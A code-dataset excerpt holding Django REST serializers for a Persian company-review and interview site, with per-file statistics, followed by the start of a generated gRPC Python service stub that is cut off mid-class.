has_legal_issue = serializers.ReadOnlyField()
reply = serializers.ReadOnlyField()
reply_created = serializers.ReadOnlyField()
total_review = serializers.ReadOnlyField()
rate_avg = serializers.ReadOnlyField()
def to_representation(self, instance):
if self.context['request'].user != instance.creator and instance.anonymous_job:
instance.job = Job(name='تخصص مخفی', job_slug='')
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count() + instance.total_view
instance.over_all_rate = round((instance.work_life_balance + instance.salary_benefit +
instance.security + instance.management + instance.culture) / 5, 1)
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
instance.start_date = instance.start_date.strftime('%Y-%m-%d') if instance.start_date else 'نامشخص'
instance.end_date = instance.end_date.strftime('%Y-%m-%d') if instance.end_date else 'نامشخص'
instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
if instance.description is None:
instance.description = ''
instance.comment_count = instance.reviewcomment_set.count()
if instance.has_legal_issue:
is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
instance.title = is_deleted_text
instance.description = is_deleted_text
instance.work_life_balance = 0
instance.salary_benefit = 0
instance.security = 0
instance.management = 0
instance.culture = 0
instance.salary = 0
else:
instance.salary = round(review_utilities.salary_handler(instance.salary, instance.salary_type, resp=True))
instance.total_review = instance.creator.profile.total_review
instance.rate_avg = instance.creator.profile.rate_avg
instance = super().to_representation(instance)
if instance['has_legal_issue']:
instance['pros'] = []
instance['cons'] = []
return instance
class UserCompanyReviewListSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
job = PublicUserJobSerializer()
# ratings
title = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
state = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
def to_representation(self, instance):
if instance.anonymous_job:
instance.job = Job(name='تخصص مخفی', job_slug='')
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count() + instance.total_view
instance.over_all_rate = round((instance.work_life_balance + instance.salary_benefit +
instance.security + instance.management + instance.culture) / 5, 1)
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
if instance.has_legal_issue:
is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
instance.title = is_deleted_text
instance.description = is_deleted_text
instance.over_all_rate = 0
instance.salary = 0
else:
if instance.description:
instance.description = instance.description.replace('<br>', '<br>\n')
soup = BeautifulSoup(instance.description, 'html.parser')
body = soup.get_text()
if len(body) > 300:
instance.description = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
else:
instance.description = body
else:
instance.description = ''
instance = super().to_representation(instance)
return instance
class UserHomeCompanyReviewListSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
# ratings
title = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
def to_representation(self, instance):
instance['company'] = {
'name': instance['company__name'],
'name_en': instance['company__name_en'],
'company_slug': instance['company__company_slug'],
'logo': instance['company__logo'],
}
instance['created'] = instance['created'].strftime('%Y-%m-%d %H:%M')
instance['my_review'] = instance['creator'] == self.context['request'].user.id
if instance['has_legal_issue']:
is_deleted_text = settings.IS_DELETED_TEXT % instance['company']['name']
instance['title'] = is_deleted_text
instance['description'] = is_deleted_text
instance['over_all_rate'] = 0
else:
if instance['description']:
instance['description'] = instance['description'].replace('<br>', '<br>\n')
soup = BeautifulSoup(instance['description'], 'html.parser')
body = soup.get_text()
if len(body) > 300:
instance['description'] = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
else:
instance['description'] = body
else:
instance['description'] = ''
instance = super().to_representation(instance)
return instance
class InterviewSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
job = PublicUserJobSerializer()
pros = ProsSerializer(many=True, required=False)
cons = ConsSerializer(many=True, required=False)
status = serializers.ChoiceField(choices=settings.INTERVIEW_STATUS)
apply_method = serializers.ChoiceField(choices=settings.APPLY_METHOD)
# ratings
interviewer_rate = serializers.ChoiceField(choices=settings.RATE_CHOICES)
total_rate = serializers.ChoiceField(choices=settings.RATE_CHOICES)
title = serializers.CharField(max_length=100)
description = serializers.CharField(max_length=40000, required=False, allow_blank=True)
asked_salary = serializers.IntegerField()
offered_salary = serializers.IntegerField()
interview_date = serializers.DateField()
response_time_before_review = serializers.ChoiceField(Interview.RESPONSE_TIME_CHOICES)
response_time_after_review = serializers.ChoiceField(Interview.RESPONSE_TIME_CHOICES, required=False)
is_deleted = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
creator_data = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
reply = serializers.ReadOnlyField()
reply_created = serializers.ReadOnlyField()
total_review = serializers.ReadOnlyField()
rate_avg = serializers.ReadOnlyField()
def validate(self, data):
if data.get('offered_salary'):
if data.get('offered_salary') > 50000000: # 50 million toman
raise serializers.ValidationError({'offered_salary': ['Max Salary in month is 50 million toman :(.']})
if data.get('asked_salary'):
if data.get('asked_salary') > 50000000: # 50 million toman
raise serializers.ValidationError({'asked_salary': ['Max Salary in month is 50 million toman :(.']})
if data.get('pros') and len(data['pros']) > 20:
raise serializers.ValidationError({'pros': ['Pros list must len 0, 20 item']})
if data.get('cons') and len(data['cons']) > 20:
raise serializers.ValidationError({'cons': ['Cons list must len 0, 20 item']})
if data.get('interview_date') and date.today() < data['interview_date']:
raise serializers.ValidationError({'start_date': ['Interview date must be lower than today']})
return data
@transaction.atomic
def create(self, validated_data):
validated_data['company'] = Company.objects.get(company_slug=validated_data['company']['company_slug'])
validated_data['creator'] = self.context['request'].user
check_create_interview_permission(validated_data['creator'], validated_data['company'])
if validated_data.get('pros') is not None:
pros_list = validated_data.pop('pros')
else:
pros_list = []
if validated_data.get('cons') is not None:
cons_list = validated_data.pop('cons')
else:
cons_list = []
if validated_data.get('description') is not None and not validated_data['description'].split(): # blank checking
validated_data.pop('description')
validated_data['job'] = Job.objects.get(job_slug=validated_data['job']['job_slug'])
validated_data['asked_salary'] = validated_data['asked_salary']
validated_data['offered_salary'] = validated_data['offered_salary']
validated_data['ip'] = utilities.get_client_ip(self.context['request'])
validated_data['approved'] = False
interview = Interview(**validated_data)
interview.save()
for pros_data in pros_list:
pros = Pros.objects.get(name=pros_data['name'])
interview.pros.add(pros)
pros.add_cons_priority()
for cons_data in cons_list:
cons = Cons.objects.get(name=cons_data['name'])
interview.cons.add(cons)
cons.add_cons_priority()
validated_data['company'].handle_company_interview_statics()
review_link = '{}/interview/{}'.format(settings.WEB_BASE_PATH, interview.pk)
utilities.telegram_notify('New interview: on {}, \n by {} {}, \n link: {} {}'.format(interview.company.name,
interview.creator.first_name,
interview.creator.last_name,
review_link,
'#interview'),
interview.id, 'interview', interview.title, interview.description,
'{} {}'.format(interview.creator.first_name, interview.creator.last_name))
return interview
@transaction.atomic
def update(self, instance, validated_data):
instance.status = validated_data.get('status', instance.status)
instance.apply_method = validated_data.get('apply_method', instance.apply_method)
instance.interviewer_rate = validated_data.get('interviewer_rate', instance.interviewer_rate)
instance.total_rate = validated_data.get('total_rate', instance.total_rate)
instance.interview_date = validated_data.get('interview_date', instance.interview_date)
instance.response_time_before_review = validated_data.get('response_time_before_review',
instance.response_time_before_review)
instance.response_time_after_review = validated_data.get('response_time_after_review',
instance.response_time_after_review)
if validated_data.get('job') and instance.job.name != validated_data['job']['name']:
instance.job = Job.objects.get(job_slug=validated_data['job']['job_slug'])
if validated_data.get('asked_salary', None) is not None and validated_data['asked_salary'] != instance.asked_salary:
instance.asked_salary = validated_data['asked_salary']
if validated_data.get('offered_salary', None) is not None and validated_data['offered_salary'] != instance.offered_salary:
instance.offered_salary = validated_data['offered_salary']
instance.title = validated_data.get('title', instance.title)
instance.description = validated_data.get('description', instance.description)
if validated_data.get('pros'):
instance.pros.clear()
for pros_data in validated_data['pros']:
pros = Pros.objects.get(name=pros_data['name'])
instance.pros.add(pros)
pros.add_cons_priority()
if validated_data.get('cons'):
instance.cons.clear()
for cons_data in validated_data['cons']:
cons = Cons.objects.get(name=cons_data['name'])
instance.cons.add(cons)
cons.add_cons_priority()
instance.save()
instance.company.handle_company_interview_statics()
interview_link = '{}/interview/{}'.format(settings.WEB_BASE_PATH, instance.pk)
utilities.telegram_notify('Interview update: on {}, \n by {} {}, \n link: {} {}'.format(instance.company.name,
instance.creator.first_name,
instance.creator.last_name,
interview_link,
'#update_interview'),
instance.id, 'interview', instance.title, instance.description,
'{} {}'.format(instance.creator.first_name, instance.creator.last_name))
return instance
def to_internal_value(self, data):
if data.get('pros'):
for pros_data in data['pros']:
pros = Pros.objects.filter(name=pros_data['name'].strip())
if not pros:
pros = Pros(name=pros_data['name'].strip())
pros.save()
if data.get('cons'):
for cons_data in data.get('cons'):
cons = Cons.objects.filter(name=cons_data['name'].strip())
if not cons:
cons = Cons(name=cons_data['name'].strip())
cons.save()
if data.get('job'):
job = Job.objects.filter(Q(name=data['job']['name'].strip()) |
Q(job_slug='-'.join(re.findall('[\w-]+', data['job']['name'].strip())).lower()))
if not job:
job = Job(name=data['job']['name'].strip(),
job_slug='-'.join(re.findall('[\w-]+', data['job']['name'].strip())).lower())
job.save()
else:
job = job[0]
data['job']['job_slug'] = job.job_slug
data = super().to_internal_value(data)
return data
def to_representation(self, instance):
instance.creator_data = {'name': instance.creator.username}
instance.offered_salary = round(instance.offered_salary/100000)/10
self.fields['offered_salary'] = serializers.FloatField()
instance.asked_salary = round(instance.asked_salary/100000)/10
self.fields['asked_salary'] = serializers.FloatField()
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count() + instance.total_view
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
instance.interview_date = instance.interview_date.strftime('%Y-%m') if instance.interview_date else 'نامشخص'
instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
instance.total_review = instance.creator.profile.total_review
instance.rate_avg = instance.creator.profile.rate_avg
instance = super().to_representation(instance)
return instance
class UserInterviewSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
job = PublicUserJobSerializer()
pros = UserProsSerializer(many=True)
cons = UserConsSerializer(many=True)
status = serializers.ReadOnlyField()
apply_method = serializers.ReadOnlyField()
interviewer_rate = serializers.ReadOnlyField()
total_rate = serializers.ReadOnlyField()
title = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
asked_salary = serializers.ReadOnlyField()
offered_salary = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
interview_date = serializers.ReadOnlyField()
response_time_before_review = serializers.ReadOnlyField()
response_time_after_review = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
reply = serializers.ReadOnlyField()
reply_created = serializers.ReadOnlyField()
total_review = serializers.ReadOnlyField()
rate_avg = serializers.ReadOnlyField()
def to_representation(self, instance):
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count() + instance.total_view
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
instance.interview_date = instance.interview_date.strftime('%Y-%m-%d') if instance.interview_date else 'نامشخص'
instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
if instance.description is None:
instance.description = ''
instance.asked_salary = instance.asked_salary
instance.offered_salary = instance.offered_salary
if instance.has_legal_issue:
is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
instance.title = is_deleted_text
instance.description = is_deleted_text
instance.interviewer_rate = 0
instance.total_rate = 0
instance.asked_salary = 0
instance.offered_salary = 0
instance.total_review = instance.creator.profile.total_review
instance.rate_avg = instance.creator.profile.rate_avg
instance = super().to_representation(instance)
if instance['has_legal_issue']:
instance['pros'] = []
instance['cons'] = []
return instance
class UserInterviewListSerializer(serializers.Serializer):
interviewer_rate = serializers.ReadOnlyField()
total_rate = serializers.ReadOnlyField()
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
job = PublicUserJobSerializer()
# ratings
title = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
status = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
def to_representation(self, instance):
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count() + instance.total_view
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
if instance.has_legal_issue:
is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
instance.title = is_deleted_text
instance.description = is_deleted_text
instance.interviewer_rate = 0
instance.total_rate = 0
else:
if instance.description:
instance.description = instance.description.replace('<br>', '<br>\n')
soup = BeautifulSoup(instance.description, 'html.parser')
body = soup.get_text()
if len(body) > 300:
instance.description = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
else:
instance.description = body
else:
instance.description = ''
instance = super().to_representation(instance)
return instance
class UserHomeInterviewListSerializer(serializers.Serializer):
total_rate = serializers.ReadOnlyField()
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
# ratings
title = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
def to_representation(self, instance):
instance['company'] = {
'name': instance['company__name'],
'name_en': instance['company__name_en'],
'company_slug': instance['company__company_slug'],
'logo': instance['company__logo'],
}
instance['created'] = instance['created'].strftime('%Y-%m-%d %H:%M')
instance['my_review'] = instance['creator'] == self.context['request'].user.id
if instance['has_legal_issue']:
is_deleted_text = settings.IS_DELETED_TEXT % instance['company']['name']
instance['title'] = is_deleted_text
instance['description'] = is_deleted_text
instance['total_rate'] = 0
else:
if instance['description']:
instance['description'] = instance['description'].replace('<br>', '<br>\n')
soup = BeautifulSoup(instance['description'], 'html.parser')
body = soup.get_text()
if len(body) > 300:
instance['description'] = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
else:
instance['description'] = body
else:
instance['description'] = ''
instance = super().to_representation(instance)
return instance
class ReviewSerializer(serializers.Serializer):
id = serializers.IntegerField()
title = serializers.ReadOnlyField()
class ReviewCommentSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
body = serializers.CharField(max_length=500)
vote_state = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
review = ReviewSerializer()
@transaction.atomic
def create(self, validated_data):
try:
validated_data['review'] = CompanyReview.objects.get(id=validated_data['review']['id'], is_deleted=False,
approved=True)
except CompanyReview.DoesNotExist as e:
raise serializers.ValidationError({'review': ['review does not exist.']})
validated_data['creator'] = self.context['request'].user
check_create_review_comment_permission(validated_data['creator'], validated_data['review'])
comment = ReviewComment(**validated_data)
validated_data['ip'] = utilities.get_client_ip(self.context['request'])
comment.save()
return comment
@transaction.atomic
def update(self, instance, validated_data):
instance.body = validated_data.get('body', instance.body)
instance.save()
return instance
def to_representation(self, instance):
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance = super().to_representation(instance)
return instance
class UserReviewCommentSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
body = serializers.CharField(max_length=500)
vote_state = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
def to_representation(self, instance):
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance = super().to_representation(instance)
return instance
class InterviewCommentSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
body = serializers.CharField(max_length=500)
vote_state = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
interview = ReviewSerializer()
@transaction.atomic
def create(self, validated_data):
try:
validated_data['interview'] = Interview.objects.get(id=validated_data['interview']['id'], is_deleted=False,
approved=True)
except Interview.DoesNotExist as e:
raise serializers.ValidationError({'interview': ['interview does not exist.']})
validated_data['creator'] = self.context['request'].user
check_create_interview_comment_permission(validated_data['creator'], validated_data['interview'])
comment = InterviewComment(**validated_data)
validated_data['ip'] = utilities.get_client_ip(self.context['request'])
comment.save()
return comment
@transaction.atomic
def update(self, instance, validated_data):
instance.body = validated_data.get('body', instance.body)
instance.save()
return instance
def to_representation(self, instance):
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance = super().to_representation(instance)
return instance
class BotApproveReviewSerializer(serializers.Serializer):
id = serializers.IntegerField()
key = serializers.CharField(max_length=100)
type = serializers.ChoiceField(choices=(('review', 'review'), ('interview', 'interview')))
class ReplyCompanyReviewSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer(read_only=True)
job = PublicUserJobSerializer(read_only=True)
recommend_to_friend = serializers.ReadOnlyField()
pros = ProsSerializer(many=True, read_only=True)
cons = ConsSerializer(many=True, read_only=True)
state = serializers.ReadOnlyField()
# ratings
work_life_balance = serializers.ReadOnlyField()
salary_benefit = serializers.ReadOnlyField()
security = serializers.ReadOnlyField()
management = serializers.ReadOnlyField()
culture = serializers.ReadOnlyField()
title = serializers.ReadOnlyField()
anonymous_job = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
salary = serializers.ReadOnlyField()
salary_type = serializers.ReadOnlyField()
start_date = serializers.ReadOnlyField()
end_date = serializers.ReadOnlyField()
current_work = serializers.ReadOnlyField()
is_deleted = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
creator_data = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
reply = serializers.CharField(max_length=40000)
reply_created = serializers.ReadOnlyField()
total_review = serializers.ReadOnlyField()
rate_avg = serializers.ReadOnlyField()
def to_representation(self, instance):
if self.context['request'].user != instance.creator and instance.anonymous_job:
instance.job = Job(name='تخصص مخفی', job_slug='')
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count()
instance.total_view = instance.total_view
instance.over_all_rate = round((instance.work_life_balance + instance.salary_benefit +
instance.security + instance.management + instance.culture) / 5, 1)
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
instance.start_date = instance.start_date.strftime('%Y-%m-%d') if instance.start_date else 'نامشخص'
instance.end_date = instance.end_date.strftime('%Y-%m-%d') if instance.end_date else 'نامشخص'
if instance.description is None:
instance.description = ''
instance.comment_count = instance.reviewcomment_set.count()
instance.salary = round(review_utilities.salary_handler(instance.salary, instance.salary_type, resp=True))
instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
instance.total_review = instance.creator.profile.total_review
instance.rate_avg = instance.creator.profile.rate_avg
instance = super().to_representation(instance)
return instance
@transaction.atomic
def update(self, instance, validated_data):
instance.reply = validated_data.get('reply', instance.reply)
if not instance.reply_created:
instance.reply_created = datetime.now()
instance.save()
return instance
class ReplyInterviewSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer(read_only=True)
job = PublicUserJobSerializer(read_only=True)
pros = UserProsSerializer(many=True, read_only=True)
cons = UserConsSerializer(many=True, read_only=True)
status = serializers.ReadOnlyField()
apply_method = serializers.ReadOnlyField()
interviewer_rate = serializers.ReadOnlyField()
total_rate = serializers.ReadOnlyField()
title = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
asked_salary = serializers.ReadOnlyField()
offered_salary = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
interview_date = serializers.ReadOnlyField()
response_time_before_review = serializers.ReadOnlyField()
response_time_after_review = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
reply = serializers.CharField(max_length=40000)
reply_created = serializers.ReadOnlyField()
total_review = serializers.ReadOnlyField()
rate_avg = serializers.ReadOnlyField()
def to_representation(self, instance):
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.down_vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count()
instance.total_view = instance.total_view
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
instance.interview_date = instance.interview_date.strftime('%Y-%m-%d') if instance.interview_date else 'نامشخص'
if instance.description is None:
instance.description = ''
instance.asked_salary = instance.asked_salary
instance.offered_salary = instance.offered_salary
instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
instance.total_review = instance.creator.profile.total_review
instance.rate_avg = instance.creator.profile.rate_avg
instance = super().to_representation(instance)
return instance
@transaction.atomic
def update(self, instance, validated_data):
instance.reply = validated_data.get('reply', instance.reply)
if not instance.reply_created:
instance.reply_created = datetime.now()
instance.save()
return instance
| 50.273346
| 130
| 0.654767
| 5,274
| 51,681
| 6.217482
| 0.046644
| 0.152237
| 0.021957
| 0.018115
| 0.876338
| 0.844439
| 0.814827
| 0.79287
| 0.775304
| 0.768931
| 0
| 0.004868
| 0.236876
| 51,681
| 1,027
| 131
| 50.322298
| 0.826568
| 0.003986
| 0
| 0.788961
| 0
| 0
| 0.069549
| 0.001846
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040043
| false
| 0
| 0.016234
| 0
| 0.422078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb5ac2555ebfc64ac1d1341eec4359bf7daf8152
| 166
|
py
|
Python
|
numbsql/tests/test_version.py
|
cpcloud/slumba
|
1efda94bcff28c682ee28a0ace8a8c6f711fc312
|
[
"Apache-2.0"
] | 19
|
2016-12-07T16:24:52.000Z
|
2021-08-31T02:25:49.000Z
|
numbsql/tests/test_version.py
|
cpcloud/numbsql
|
9fe03b40368a3557bab636afa4236f5c0bd4b7fa
|
[
"Apache-2.0"
] | 92
|
2021-09-04T11:39:57.000Z
|
2022-01-31T00:24:37.000Z
|
numbsql/tests/test_version.py
|
cpcloud/numbsql
|
9da75faca0b02b59b4bca8854a0efa6b3ca3bb98
|
[
"Apache-2.0"
] | 1
|
2019-12-06T22:06:33.000Z
|
2019-12-06T22:06:33.000Z
|
import sqlite3
from numbsql.sqlite import sqlite3_libversion
def test_version() -> None:
assert sqlite3_libversion() == sqlite3.sqlite_version.encode("ascii")
| 20.75
| 73
| 0.777108
| 20
| 166
| 6.25
| 0.65
| 0.208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027586
| 0.126506
| 166
| 7
| 74
| 23.714286
| 0.834483
| 0
| 0
| 0
| 0
| 0
| 0.03012
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cb87bc217152ad8ec20c85136821792a8e2a5ab4
| 19,234
|
py
|
Python
|
dist/python/services/model_base_service_pb2_grpc.py
|
crawlab-team/crawlab-grpc
|
be19dc86f20da4530b6741431bb83adeed8e4a79
|
[
"BSD-3-Clause"
] | null | null | null |
dist/python/services/model_base_service_pb2_grpc.py
|
crawlab-team/crawlab-grpc
|
be19dc86f20da4530b6741431bb83adeed8e4a79
|
[
"BSD-3-Clause"
] | 1
|
2021-11-09T15:32:13.000Z
|
2021-11-09T15:32:13.000Z
|
dist/python/services/model_base_service_pb2_grpc.py
|
crawlab-team/crawlab-grpc
|
be19dc86f20da4530b6741431bb83adeed8e4a79
|
[
"BSD-3-Clause"
] | 1
|
2021-09-22T01:29:24.000Z
|
2021-09-22T01:29:24.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from entity import request_pb2 as entity_dot_request__pb2
from entity import response_pb2 as entity_dot_response__pb2
class ModelBaseServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetById = channel.unary_unary(
'/grpc.ModelBaseService/GetById',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.Get = channel.unary_unary(
'/grpc.ModelBaseService/Get',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.GetList = channel.unary_unary(
'/grpc.ModelBaseService/GetList',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.DeleteById = channel.unary_unary(
'/grpc.ModelBaseService/DeleteById',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.Delete = channel.unary_unary(
'/grpc.ModelBaseService/Delete',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.DeleteList = channel.unary_unary(
'/grpc.ModelBaseService/DeleteList',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.ForceDeleteList = channel.unary_unary(
'/grpc.ModelBaseService/ForceDeleteList',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.UpdateById = channel.unary_unary(
'/grpc.ModelBaseService/UpdateById',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.Update = channel.unary_unary(
'/grpc.ModelBaseService/Update',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.UpdateDoc = channel.unary_unary(
'/grpc.ModelBaseService/UpdateDoc',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.Insert = channel.unary_unary(
'/grpc.ModelBaseService/Insert',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
self.Count = channel.unary_unary(
'/grpc.ModelBaseService/Count',
request_serializer=entity_dot_request__pb2.Request.SerializeToString,
response_deserializer=entity_dot_response__pb2.Response.FromString,
)
class ModelBaseServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def GetById(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Get(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetList(self, request, context):
